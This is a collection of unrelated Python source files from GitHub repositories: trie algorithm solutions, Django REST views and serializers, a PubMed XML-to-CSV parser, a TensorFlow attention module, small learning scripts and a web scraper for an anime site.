+{"seq_id":"16277302511","text":"import collections\nfrom typing import List\n\n\nclass TrieNode:\n def __init__(self, word=None):\n self.word = word\n self.children = collections.defaultdict(TrieNode)\n\n\nclass Trie:\n\n def __init__(self):\n self.head = TrieNode()\n\n def insert(self, word: str) -> None:\n def insert_char(remaining_word, node):\n if not remaining_word:\n node.word = word\n return\n if remaining_word[0] not in node.children:\n node.children[remaining_word[0]] = TrieNode()\n node = node.children[remaining_word[0]]\n insert_char(remaining_word[1:], node)\n\n insert_char(word, self.head)\n\n def search(self, word: str) -> bool:\n def search_char(remaining_word, node):\n if not remaining_word:\n return node.word is not None\n if remaining_word[0] not in node.children:\n return False\n elif search_char(remaining_word[1:], node.children[remaining_word[0]]):\n return True\n return False\n\n return search_char(word, self.head)\n\n def starts_with(self, prefix: str) -> bool:\n def starts_with_char(remaining_prefix, node):\n if not remaining_prefix:\n return True\n elif remaining_prefix[0] not in node.children:\n return False\n else:\n return starts_with_char(remaining_prefix[1:], node.children[remaining_prefix[0]])\n\n return starts_with_char(prefix, self.head)\n\n\nclass WordDictionary:\n\n def __init__(self):\n self.head = TrieNode()\n\n def addWord(self, word: str) -> None:\n def add_char(word_remaining, node):\n if not word_remaining:\n node.word = word\n else:\n if word_remaining[0] not in node.children:\n node.children[word_remaining[0]] = TrieNode()\n node = node.children[word_remaining[0]]\n add_char(word_remaining[1:], node)\n\n add_char(word, self.head)\n\n def search(self, word: str) -> bool:\n def search_char(word_remaining, node):\n if not word_remaining:\n return node.word is not None\n if word_remaining[0] == '.':\n for key in node.children:\n if search_char(word_remaining[1:], node.children[key]):\n return True\n return False\n elif word_remaining[0] not in node.children:\n return False\n else:\n return search_char(word_remaining[1:], node.children[word_remaining[0]])\n\n return search_char(word, self.head)\n\n\nclass ReplaceWordTrie:\n def __init__(self):\n self.head = TrieNode()\n\n def add(self, word):\n def add_character(word_remaining, node):\n if not word_remaining:\n node.word = word\n else:\n if word_remaining[0] not in node.children:\n node.children[word_remaining[0]] = TrieNode()\n node = node.children[word_remaining[0]]\n add_character(word_remaining[1:], node)\n\n add_character(word, self.head)\n\n def starts_with(self, word):\n def starts_with_character(word_remaining, node):\n if node.word:\n return node.word\n elif word_remaining[0] not in node.children:\n return None\n else:\n return starts_with_character(word_remaining[1:], node.children[word_remaining[0]])\n\n return starts_with_character(word, self.head)\n\n\ndef replaceWords(dictionary: List[str], sentence: str) -> str:\n trie = ReplaceWordTrie()\n for word in dictionary:\n trie.add(word)\n\n result = []\n for word in sentence.split(' '):\n replacement = trie.starts_with(word)\n if replacement:\n result.append(replacement)\n else:\n result.append(word)\n return ' '.join(result)\n\n\nclass MagicDictionary:\n\n def __init__(self):\n self.head = TrieNode()\n\n def buildDict(self, dictionary: List[str]) -> None:\n def build_character(remaining, node):\n if not remaining:\n node.word = True\n else:\n if remaining[0] not in node.children:\n node.children[remaining[0]] = TrieNode()\n node = 
node.children[remaining[0]]\n build_character(remaining[1:], node)\n\n for word in dictionary:\n build_character(word, self.head)\n\n def search(self, searchWord: str) -> bool:\n def search_remaining(forgiven_one, remaining_word, node):\n if not remaining_word:\n return node.word is not None and not forgiven_one\n if remaining_word[0] not in node.children:\n if forgiven_one:\n for child_key in node.children:\n if search_remaining(False, remaining_word[1:], node.children[child_key]):\n return True\n return False\n else:\n return search_remaining(forgiven_one, remaining_word[1:], node.children[remaining_word[0]])\n\n return search_remaining(True, searchWord, self.head)\n\n\nclass MapSumTrieNode:\n def __init__(self, value=0):\n self.children = collections.defaultdict(TrieNode)\n self.value = value\n\n\nclass MapSum:\n\n def __init__(self):\n self.head = MapSumTrieNode()\n\n def insert(self, key: str, val: int) -> None:\n def insert_remaining(remaining_key, node):\n if not remaining_key:\n node.value = val\n else:\n if remaining_key[0] not in node.children:\n node.children[remaining_key[0]] = MapSumTrieNode()\n node = node.children[remaining_key[0]]\n insert_remaining(remaining_key[1:], node)\n\n insert_remaining(key, self.head)\n\n def sum(self, prefix: str) -> int:\n def sum_prefix(remaining_prefix, node):\n if not remaining_prefix:\n return sum_gather(node)\n elif remaining_prefix[0] not in node.children:\n return 0\n else:\n return sum_prefix(remaining_prefix[1:], node.children[remaining_prefix[0]])\n\n def sum_gather(node):\n value = node.value\n for child_key in node.children:\n value += sum_gather(node.children[child_key])\n return value\n\n return sum_prefix(prefix, self.head)\n\n\nclass BoldTagTrieNode:\n def __init__(self, word=None):\n self.word = word\n self.children = collections.defaultdict(BoldTagTrieNode)\n\n\nclass BoldTagTrie:\n def __init__(self):\n self.head = BoldTagTrieNode()\n self.pointer = self.head\n\n def insert(self, word):\n def recursive_insert(node, word_remaining):\n if not word_remaining:\n node.word = word\n elif word_remaining[0] in node.children:\n recursive_insert(node.children[word_remaining[0]], word_remaining[1:])\n else:\n temp_node = BoldTagTrieNode()\n node.children[word_remaining[0]] = temp_node\n recursive_insert(node.children[word_remaining[0]], word_remaining[1:])\n\n recursive_insert(self.head, word)\n\n def slow_search(self, letter):\n if letter in self.pointer.children:\n self.pointer = self.pointer.children[letter]\n return True\n return False\n\n def reset_pointer(self):\n self.pointer = self.head\n\n\ndef addBoldTag(s: str, words: List[str]) -> str:\n trie = BoldTagTrie()\n for word in words:\n trie.insert(word)\n\n painting = [False for _ in range(len(s))]\n\n for i in range(len(s)):\n for j in range(i, len(s)):\n if not trie.slow_search(s[j]):\n trie.reset_pointer()\n break\n if trie.pointer.word:\n painting[i:j + 1] = [True] * (j - i + 1)\n open = False\n result = ''\n\n for i, character in enumerate(s):\n if not open and painting[i] == True:\n result += ''\n open = True\n elif open and painting[i] == False:\n result += ''\n open = False\n result += character\n\n if open:\n result += ''\n\n return result\n\n\ns = \"abcxyz123\"\nwords = [\"abc\", \"123\"]\naddBoldTag(s, words)\n\n\ndef findWords(board: List[List[str]], words: List[str]) -> List[str]:\n class FindWordNode:\n def __init__(self):\n self.word = None\n self.children = collections.defaultdict(FindWordNode)\n\n class FindWordTrie:\n def __init__(self, board):\n self.board = 
board\n self.head = FindWordNode()\n self.directions = [[-1, 0], [1, 0], [0, 1], [0, -1]]\n\n def add_word(self, word):\n def recursive_add(node, word_remaining):\n if not word_remaining:\n node.word = word\n return\n letter = word_remaining[0]\n if letter not in node.children:\n node.children[letter] = FindWordNode()\n recursive_add(node.children[letter], word_remaining[1:])\n\n recursive_add(self.head, word)\n\n def traverse_position(self, x, y, node):\n result = []\n self.board[x][y], temp = None, self.board[x][y]\n if node.word:\n result.append(node.word)\n for x_direction, y_direction in self.directions:\n x_target, y_target = x + x_direction, y + y_direction\n if 0 <= x_target < len(self.board) and 0 <= y_target < len(self.board[0]):\n letter = self.board[x_target][y_target]\n if letter and letter in node.children:\n result.extend(self.traverse_position(x_target, y_target, node.children[letter]))\n self.board[x][y] = temp\n return result\n\n def traverse_board(self):\n result = []\n for x, row in enumerate(self.board):\n for y, value in enumerate(row):\n if value in self.head.children:\n result.extend(self.traverse_position(x, y, self.head.children[value]))\n return result\n\n trie = FindWordTrie(board)\n for word in words:\n trie.add_word(word)\n return trie.traverse_board()\n","repo_name":"daniel-zeiler/potential-happiness","sub_path":"Trie/Solutions.py","file_name":"Solutions.py","file_ext":"py","file_size_in_byte":10488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"23582360588","text":"from cProfile import label\nfrom rest_framework import serializers\nfrom .models import BloodTest\n\nclass BloodTestSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = BloodTest\n fields = '__all__'\n read_only_fields = ['id']\n\nclass ManyTestsSerializer(serializers.ModelSerializer):\n models = serializers.MultipleChoiceField(choices=[\n ('AdaBoostClassifier', 'Адаптивний бустинг'),\n ('DecisionTreeClassifier', 'Дерево рішень'),\n ('ExtraTreesClassifier', 'Ектра дерева'),\n ('GaussianNB', 'Гаусовий наївний байєсів класифікатор'),\n ('KNeighborsClassifier', 'К найближчих сусідів'),\n ('LogisticRegressionCV', 'Логістична регресія'),\n ('RandomForestClassifier', 'Випадковий ліс'),\n ('SVC', 'Метод опорних векторів'),\n ('VotingClassifier', 'Голосуючий класифікатор'),\n ('XGBClassifier', 'Ектримальний бустинг'),\n ])\n\n class Meta:\n model = BloodTest\n fields = '__all__'\n read_only_fields = ['id']\n\n\nclass PredictionResultSerializer(serializers.Serializer):\n model_name = serializers.CharField(label='Модель прогнозування')\n death_probability = serializers.FloatField(label='Ймовірність загинути')\n cure_probability = serializers.FloatField(label='Ймовірність одужати')","repo_name":"MaxymRomanchuk/covid-survival-checker","sub_path":"checker/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"uk","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"}
+{"seq_id":"23469321318","text":"from random import randint\nfrom time import sleep\n\ntot = 1\nnumeros = []\njogos = []\n\nprint('-'*30)\nprint(' JOGA NA MEGA SENA ')\nprint('-'*30)\n\nquant = int(input('Quantos jogos quer que eu sorteie? '))\n\nwhile tot <= quant:\n cont = 0\n while True:\n num = randint(0, 60)\n if num not in numeros:\n numeros.append(num)\n cont += 1\n if cont >= 6:\n break\n numeros.sort()\n jogos.append(numeros[:])\n numeros.clear()\n tot += 1\nprint('-=' * 3, 'SORTEANDO', '-=' * 3)\n\nfor i, n in enumerate(jogos):\n print(f'JOGO {i+1}: {n}')\n sleep(.5)\n\nprint('='*5,'BOA SORTE!', '='*5)\n","repo_name":"Brunnobeloti/Python","sub_path":"Desafios/MODULO3/ex088.py","file_name":"ex088.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"1790162252","text":"from django.contrib.auth import authenticate\nfrom django.contrib.auth.models import User, Group\nfrom rest_framework import status, viewsets\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.throttling import UserRateThrottle\nfrom rest_framework.views import APIView\n\nfrom haas.serializers import UserSerializer, GroupSerializer, StatisticsSerializer\nfrom haas.hashers import DummyHasher, Md5Hasher, Sha1Hasher, Sha256Hasher\nfrom haas.models import Statistics\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = User.objects.all().order_by('-date_joined')\n serializer_class = UserSerializer\n\n\nclass UserRegister(APIView):\n \"\"\"\n Creates the user.\n \"\"\"\n\n def post(self, request, format='json'):\n serializer = UserSerializer(data=request.data, context={'request': request})\n if serializer.is_valid():\n user = serializer.save()\n if user:\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserLogin(APIView):\n \"\"\"\n Creates the user.\n \"\"\"\n\n def post(self, request, format='json'):\n username = request.data.get(\"username\")\n password = request.data.get(\"password\")\n\n user = authenticate(username=username, password=password)\n if not user:\n return Response({\"error\": \"Login failed\"}, status=status.HTTP_401_UNAUTHORIZED)\n\n token, _ = Token.objects.get_or_create(user=user)\n return Response({\"token\": token.key})\n\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass DummyHashView(APIView):\n def get(self, request, *args, **kw):\n dummy_hasher = DummyHasher()\n\n return Response({'hash': dummy_hasher.hash()})\n\n\nclass HashView(APIView):\n permission_classes = (IsAuthenticated,)\n throttle_classes = (UserRateThrottle,)\n\n def post(self, request, *args, **kw):\n data = request.data.get('data', None) # TODO: Add validation on input length\n iterations = request.data.get('iterations', None)\n algorithm = request.data.get('algorithm', None)\n\n if (data is None or iterations is None or algorithm is None):\n return Response(\n 'Bad request, POST data should be {\"data\": \"seald is awesome\", \"algorithm\": \"md5\", \"iterations\": 1}',\n status=status.HTTP_400_BAD_REQUEST\n )\n\n try:\n int(iterations)\n except:\n return Response(\n '\"iterations\" should be an integer',\n status=status.HTTP_400_BAD_REQUEST\n )\n\n if algorithm.lower() == 'md5':\n hasher = Md5Hasher(data, int(iterations))\n elif algorithm.lower() == 'sha1':\n hasher = Sha1Hasher(data, int(iterations))\n elif algorithm.lower() == 'sha256':\n hasher = Sha256Hasher(data, int(iterations))\n else:\n return Response(\n '\"algorithm\" should be md5, sha1 or sha256',\n status=status.HTTP_400_BAD_REQUEST\n )\n\n statistics = Statistics(user=request.user, algorithm=algorithm, data=data, iterations=iterations)\n statistics.save()\n\n return Response({'hash': hasher.hash()})\n\n\nclass StatisticsView(APIView):\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format='json'):\n statistics = request.user.statistics_set.all()\n serializer = StatisticsSerializer(statistics, many=True, context={'request': 
request})\n\n return Response(serializer.data)\n","repo_name":"achntrl/HashaaS","sub_path":"haas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"26371390253","text":"import cv2\n\n#show Images\n# img = cv2.imread(\"Resources/pikachu.png\")\n# cv2.imshow(\"Output\", img)\n# cv2.waitKey(0)\n\n#Show Video\ncap = cv2.VideoCapture(\"Resources/pikachu.mp4\")\n\nwhile True:\n success, img = cap.read()\n cv2.imshow(\"Video\", img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break","repo_name":"LindaWang7/OpenCV_Learning","sub_path":"chapter_1.py","file_name":"chapter_1.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"32358595792","text":"import const, Filters, queue, sys, os, logging, AddFilters, SrtFilter\n\nclass BadIniFile(Exception):\n pass\n\nconst.SOURCE = \"source\"\nconst.SINK = \"sink\"\nconst.PIPE = \"pipe\"\nconst.FILTERS = \"filters\"\n\nconst.SEP_KEY_VALUE = \":\"\nconst.SEP_VALUE = \"^\"\nconst.SEP_ARGUMENT = \"|\"\n\ndef stripLineList( lineList ):\n resultList = []\n for line in lineList:\n resultList.append( line.strip() )\n return resultList\n\n\nclass Factory:\n def __init__(self, iniFile): #load iniFile\n \n self.__dic = {}\n self.__pipeList = []\n self.__filterList = []\n\n self.__load(iniFile)\n\n def __load(self, iniFile):\n logging.info( 'Factory __load :' + iniFile)\n file = open(iniFile)\n #make dictionary\n for line in file.readlines():\n line = line.strip()\n line = line.strip(os.linesep)\n\n if 0 == line.find('#') : # # is comment\n continue\n \n if '' != line:\n self.__innerLoad(line)\n\n\n def __innerLoad(self, line):\n\n keyValueList = line.split( const.SEP_KEY_VALUE )\n #strip\n keyValueList = stripLineList( keyValueList)\n\n if 2 != len(keyValueList) : # must conist key : value\n raise BadIniFile(\"Invalid key value IniFile (%s)\" % line )\n\n if const.FILTERS == keyValueList[0] : # filters is plural\n self.__dic[keyValueList[0] ] = keyValueList[1]\n #self.__dic[keyValueList[0] ] = keyValueList[1].split( const.SEP_VALUE )\n \n\n else:\n if 1 != len( keyValueList[1].split( const.SEP_VALUE ) ) :\n raise BadIniFile( \"Too many value IniFile (%s)\"% line)\n self.__dic[keyValueList[0] ] = keyValueList[1]\n\n def create(self, sourceFile, destFile):\n \"\"\" make queue and soruceFilter\"\"\"\n queueSrc = self.__makeClass( self.__dic[const.PIPE] )\n argList = []\n argList.append(queueSrc)\n argList.append(sourceFile)\n \n srcFilter = self.__makeClass( self.__dic[const.SOURCE], argList ) \n\n self.__pipeList.append( queueSrc)\n self.__filterList.append( srcFilter)\n \n \"\"\" make Filters \"\"\"\n sourcePipe = queueSrc\n for filterExp in self.__dic[const.FILTERS].split( const.SEP_VALUE ) :\n filterExp = filterExp.strip() # strip\n queue = self.__makeClass( self.__dic[const.PIPE] )\n \n sinkPipe = queue\n argList = []\n argList.append( sourcePipe)\n argList.append( sinkPipe)\n \n centerFilter = self.__makeClass( filterExp , argList)\n self.__pipeList.append(queue)\n self.__filterList.append(centerFilter)\n sourcePipe = queue\n\n \"\"\" make SinkFilter \"\"\"\n argList = []\n argList.append( sinkPipe)\n argList.append( destFile)\n sinkFilter = self.__makeClass( self.__dic[const.SINK], argList ) \n self.__filterList.append(sinkFilter)\n\n def __makeClass( self, expression, preArgList = None ):\n \"\"\" make preArgument \"\"\"\n expList = expression.split( const.SEP_ARGUMENT )\n\n expList = stripLineList( expList) # strip\n\n strExp = expList[0] + \"(\"\n\n \"\"\" add preArgList \"\"\"\n if None != preArgList :\n for i in range(len(preArgList) ) :\n strExp += \"preArgList[\" + str(i) + \"],\"\n\n \"\"\" add argument \"\"\"\n if 2 == len(expList):\n strExp += expList[1] + \")\"\n elif 1 == len(expList):\n strExp += \")\"\n else:\n raise BadIniFile( \"Invalid class expression (%s)\"% expression)\n\n logging.info('Factory:__makeClass ' + strExp)\n\n return eval( strExp )\n\n def run(self):\n \"\"\" start run method in thread \"\"\"\n\n for thread in self.__filterList :\n thread.start()\n\n for thread in self.__filterList :\n thread.join() # wait for thread exits\n\n\n\ndef main():\n if 3 == len(sys.argv) or 4 == len(sys.argv) :\n sourceFile = sys.argv[1]\n sinkFile = 
sys.argv[2]\n if 4 == len(sys.argv) :\n iniFile = sys.argv[3]\n else:\n iniFile = \"./default.ini\"\n\n # create Factory\n\n iniFile = os.path.normpath(iniFile)\n factory = Factory(iniFile)\n\n sourceFile = os.path.normpath(sourceFile)\n sinkFile = os.path.normpath(sinkFile)\n factory.create( sourceFile, sinkFile)\n\n factory.run()\n\n #finish\n else:\n print(\"usage : [sourceFile] [destFile] [iniFile]\")\n\ndef direct( sourceFile, sinkFile, iniFile = './default.ini' ):\n # create Factory\n factory = Factory(iniFile)\n factory.create( sourceFile, sinkFile )\n factory.run()\n\n #finish\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n# logging.basicConfig(filename='test.log', level=logging.DEBUG )\n main()\n","repo_name":"bysju/caption_modifier","sub_path":"caption_modifier.py","file_name":"caption_modifier.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"8"}
+{"seq_id":"33220009271","text":"import sys\nimport os\nimport tensorflow as tf\nimport numpy as np\n\n\ndef attention_bias_lower_triangle(length):\n band = tf.matrix_band_part(tf.ones([length, length]), -1, 0)\n band = tf.reshape(band, [1, 1, length, length])\n return -1e9 * (1.0 - band)\n\ndef attention_bias_by_pad_indicator(memory_padding):\n ret = memory_padding * -1e9\n return tf.expand_dims(tf.expand_dims(ret, axis=1), axis=1)\n\nclass MultiHeadAttention(object):\n def __init__(self, num_heads=1, linear_key_dim=50, linear_value_dim=50,\n hidden_size=100, dropout=1.0, attention_bias=None):\n\n assert linear_key_dim % num_heads == 0\n assert linear_value_dim % num_heads == 0\n\n self.num_heads = num_heads\n self.linear_key_dim = linear_key_dim\n self.linear_value_dim = linear_value_dim\n self.hidden_size = hidden_size\n self.dropout = dropout\n self.attention_bias = attention_bias\n\n\n def build(self, q, k, v):\n q, k, v = self._linear_projection(q, k, v)\n qs, ks, vs = self._split_heads(q, k, v)\n outputs = self._scaled_dot_product(qs, ks, vs)\n output = self._concat_heads(outputs)\n output = tf.layers.dense(output, self.hidden_size, use_bias=False)\n\n return tf.nn.dropout(output, keep_prob=self.dropout)\n\n def _linear_projection(self, q, k, v):\n q = tf.layers.dense(q, self.linear_key_dim, use_bias=False)\n k = tf.layers.dense(k, self.linear_key_dim, use_bias=False)\n v = tf.layers.dense(v, self.linear_value_dim, use_bias=False)\n return q, k, v\n\n def _split_heads(self, q, k, v):\n\n def split_last_dimension_then_transpose(tensor, num_heads, dim):\n t_shape = tensor.get_shape().as_list()\n tensor = tf.reshape(tensor, [-1] + t_shape[1: -1] + [num_heads, dim // num_heads])\n return tf.transpose(tensor, [0, 2, 1, 3]) # [batch_size, num_heads, max_seq_len, dim]\n\n qs = split_last_dimension_then_transpose(q, self.num_heads, self.linear_key_dim)\n ks = split_last_dimension_then_transpose(k, self.num_heads, self.linear_key_dim)\n vs = split_last_dimension_then_transpose(v, self.num_heads, self.linear_value_dim)\n\n return qs, ks, vs\n\n def _scaled_dot_product(self, qs, ks, vs):\n key_dim_per_head = self.linear_key_dim // self.num_heads\n o1 = tf.matmul(qs, ks, transpose_b=True) / (key_dim_per_head ** 0.5)\n o2 = o1 + self.attention_bias if self.attention_bias is not None else o1\n o3 = tf.nn.softmax(o2)\n return tf.matmul(o3, vs)\n\n\n def _concat_heads(self, outputs):\n\n def transpose_then_concat_last_two_dimension(tensor):\n tensor = tf.transpose(tensor, [0, 2, 1, 3])\n t_shape = tensor.get_shape().as_list()\n num_heads, dim = t_shape[-2:]\n return tf.reshape(tensor, [-1] + t_shape[1:-2] + [num_heads * dim])\n\n return transpose_then_concat_last_two_dimension(outputs)\n","repo_name":"timewait/cikm","sub_path":"src/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"30410234264","text":"import os\nimport xml.etree.ElementTree as ET\nimport csv\nimport sys\nimport time\nfrom lxml import etree\nfrom kg_builder.conf.config import get_sys_config\n\n# get file paths that will be used\nkg_env = os.environ.get('KG_ENV')\nxml_folder = get_sys_config('tmp_folder', kg_env)\ncsv_folder = get_sys_config('pubmed_csv_files_location', kg_env)\narticle_node_folder = csv_folder + '/articles'\narticle_mesh_folder = csv_folder + '/mesh'\narticle_ct_folder = csv_folder + '/ct'\n\n\ndef PubmedArticleParser(elem):\n\n PubMed = {\"pmid\": \"\",\n \"url\": \"\",\n \"title\" : \"\",\n \"journal\": \"\",\n \"pub_date_year\": \"\",\n \"pub_date_month\": \"\",\n \"pub_date_day\": \"\"}\n\n searchTermList = ('patient','Patient','volunteer', 'Volunteer', 'clinical trial', 'Clinical Trial', 'Clinical Trial')\n eligible = 0\n PubMedCTList = []\n PubMedMeshList = []\n # check if it's a valid pubmed article by looking for PMID\n PMID = elem.findtext('MedlineCitation/PMID')\n if PMID != None:\n PubMed['pmid'] = PMID\n # now we check to see if this article is worth including.\n # we include it if one of the search terms are found in the abstract - indicating that the paper references human subjects\n pubYear = elem.findtext('MedlineCitation/Article/Journal/JournalIssue/PubDate/Year')\n if (pubYear != None):\n if (int(pubYear) >= 1990):\n PubMed[\"pub_date_year\"] = pubYear\n abstract = elem.findtext('MedlineCitation/Article/Abstract/AbstractText')\n if abstract != None:\n if any(term in abstract for term in searchTermList):\n eligible = 1\n # we also include it if we can find an NCT number in the secondary IDs (with a subheader of clinicaltrials.gov)\n if elem.find('MedlineCitation/Article/DataBankList/DataBank/DataBankName') != None:\n if elem.find('MedlineCitation/Article/DataBankList/DataBank/DataBankName').text == \"ClinicalTrials.gov\":\n accessionNumberList = elem.findall(\n 'MedlineCitation/Article/DataBankList/DataBank/AccessionNumberList/AccessionNumber')\n for number in accessionNumberList:\n PubMedCT = {\"pmid\": PMID,\n \"nct_id\": number.text\n }\n PubMedCTList.append(PubMedCT)\n eligible = 1\n\n # if the trial is eligible, we parse out the rest of the fields.\n if eligible == 1:\n ChemicalList= elem.findall('MedlineCitation/ChemicalList/Chemical/NameOfSubstance')\n for chemical in ChemicalList:\n PubMedMesh = {\"pmid\": PMID,\n \"mesh_term\" : chemical.text,\n \"type\" : \"chemList\"\n }\n PubMedMeshList.append(PubMedMesh)\n\n SupplMeshList= elem.findall('MedlineCitation/SupplMeshList/SupplMeshName')\n for suppMesh in SupplMeshList:\n PubMedMesh = {\"pmid\": PMID,\n \"mesh_term\" : suppMesh.text,\n \"type\" : \"suppList\"\n }\n PubMedMeshList.append(PubMedMesh)\n\n MeshList= elem.findall('MedlineCitation/MeshHeadingList/MeshHeading')\n for mesh in MeshList:\n PubMedMesh = {\"pmid\": PMID,\n \"mesh_term\" : mesh.findtext('./DescriptorName'),\n \"type\" : \"meshList\"\n }\n PubMedMeshList.append(PubMedMesh)\n\n PubMed[\"url\"] = \"https://www.ncbi.nlm.nih.gov/pubmed/\" + PubMed['pmid']\n pubYear = elem.findtext('MedlineCitation/Article/Journal/JournalIssue/PubDate/Year')\n if pubYear != None:\n PubMed[\"pub_date_year\"] = pubYear\n pubMonth = elem.findtext('MedlineCitation/Article/Journal/JournalIssue/PubDate/Month')\n if pubMonth != None:\n PubMed[\"pub_date_month\"] = pubMonth\n pubDay = elem.findtext('MedlineCitation/Article/Journal/JournalIssue/PubDate/Day')\n if pubDay != None:\n PubMed[\"pub_date_day\"] = pubDay\n journal = 
elem.findtext('MedlineCitation/Article/Journal/Title')\n if journal != None:\n PubMed[\"journal\"] = journal\n title = elem.findtext('MedlineCitation/Article/ArticleTitle')\n if title != None :\n PubMed[\"title\"] = title\n return PubMed, PubMedCTList, PubMedMeshList\n else:\n return None, None, None\n else :\n return None, None, None\n\n\ndef xml_to_csv_pubmed_parser(filename):\n\n input_filename = filename +\".xml\"\n output_filename = filename\n\n xml_filename = os.path.join(xml_folder, input_filename)\n article_node_filename = os.path.join(article_node_folder, (output_filename + \"_article.csv\"))\n article_mesh_filename = os.path.join(article_mesh_folder, (output_filename + \"_mesh.csv\"))\n article_ct_filename = os.path.join(article_ct_folder, (output_filename+ \"_ct.csv\"))\n\n article_node_fields = [\"pmid\",\"url\",\"title\",\"journal\",\"pub_date_year\",\"pub_date_month\",\"pub_date_day\"]\n article_mesh_fields = [\"pmid\", \"mesh_term\", \"type\"]\n article_ct_fields = [\"pmid\", \"nct_id\"]\n\n\n if not os.path.exists(xml_folder):\n os.makedirs(xml_folder)\n if not os.path.exists(article_node_folder):\n os.makedirs(article_node_folder)\n if not os.path.exists(article_mesh_folder):\n os.makedirs(article_mesh_folder)\n if not os.path.exists(article_ct_folder):\n os.makedirs(article_ct_folder)\n\n with open (article_node_filename, 'w',encoding=\"utf-8\") as article_node_file, open (article_mesh_filename , 'w',encoding=\"utf-8\") as article_mesh_file, open (article_ct_filename , 'w',encoding=\"utf-8\") as article_ct_file :\n writer1 = csv.DictWriter(article_node_file, fieldnames=article_node_fields , quoting=csv.QUOTE_NONNUMERIC )\n writer1.writeheader()\n writer2 = csv.DictWriter(article_ct_file, fieldnames=article_ct_fields , quoting=csv.QUOTE_NONNUMERIC)\n writer2.writeheader()\n writer3 = csv.DictWriter(article_mesh_file, fieldnames=article_mesh_fields , quoting=csv.QUOTE_NONNUMERIC)\n writer3.writeheader()\n\n filename_without_extension, extension = os.path.splitext(input_filename)\n if extension == '.xml':\n with open(xml_filename, 'r',encoding=\"utf-8\") as f:\n print(\"Processing : \" + input_filename)\n start = time.time()\n context = etree.iterparse(xml_filename, tag='PubmedArticle', encoding = 'utf-8')\n for event, elem in context:\n Pubmed, PubmedCT, PubmedMesh = PubmedArticleParser(elem)\n\n if (Pubmed!= None):\n writer1.writerow(Pubmed)\n\n if (PubmedCT != None):\n for CT in PubmedCT:\n writer2.writerow(CT)\n\n if (PubmedMesh != None):\n for mesh in PubmedMesh:\n writer3.writerow(mesh)\n\n elem.clear()\n if elem.getprevious() is not None:\n del elem.getparent()[0]\n end = time.time()\n print(end-start)\n \n","repo_name":"e599/trialsearch","sub_path":"kg_builder/pubmed/xml_to_csv_pubmed_parse.py","file_name":"xml_to_csv_pubmed_parse.py","file_ext":"py","file_size_in_byte":7566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"38717096738","text":"import os\n\n\ndef get_env_var(variable: str) -> str:\n value = os.environ.get(variable)\n if value:\n # Remove the quotation marks if they exist\n if value.startswith('\"') and value.endswith('\"'):\n value = value[1:-1]\n return value\n\n return value\n\n print(\"Environment variable not set.\")\n","repo_name":"Lightblash/telegram-bot-expense-tracker","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"36216324791","text":"from itertools import groupby\nfrom pprint import pprint\nimport requests\n\nurl = 'http://universities.hipolabs.com/search'\n\nheaders = {\"Accept\": 'application/json'}\n\nr = requests.get(url=url,headers=headers)\n\nuniversities = list(r.json())\n\ncountries = list( map( lambda x: x['country'], universities) )\n\ncountries.sort()\ncountries = dict( \n map( lambda t: (t[0], len(list(t[1]))), groupby(countries))\n )\npprint(countries)","repo_name":"vbmchik/py2064","sub_path":"day17/day17_2.py","file_name":"day17_2.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"22631744252","text":"from pprint import pprint\n\ntry:\n import sys\n import os\n\n sys.path.append(\n os.path.abspath(\n os.path.join(\n os.path.dirname(__file__), '..'\n )\n )\n )\n\nexcept Exception as error:\n print(error)\nimport time\nimport logging as log\nlog.basicConfig(\n filename='logs.log', level=log.DEBUG, filemode='w', format='%(levelname)s - %(name)s - %(funcName)s - %(message)s'\n)\nfrom requester.factory import Requesters\nfrom parser.factory import Parsers\nfrom animesonline_online.site import AnimesonlineOnline\nfrom database.databases import SQLite\n\nfirst_page = 'https://animesonlinecc.to/anime/'\n\nreq = Requesters.use_requests()\nparser = Parsers.use_bs4()\n\nsite = AnimesonlineOnline(parser, req)\ndb = SQLite()\nsite_anime_db = site.get_series_db(db)\n\ndata = []\nfor page in range(2, 80):\n time.sleep(.2)\n content = req.get_content(f'https://ww31.animesonline.online/animes/page/{page}/', type='text')\n animes = parser.select_all(content, 'div.animation-2 article.item div.data h3 a')\n titles = [a.text for a in animes]\n links = [a.get('href') for a in animes]\n data += [{'anime': a, 'link': l} for a, l in zip(titles, links)]\n# 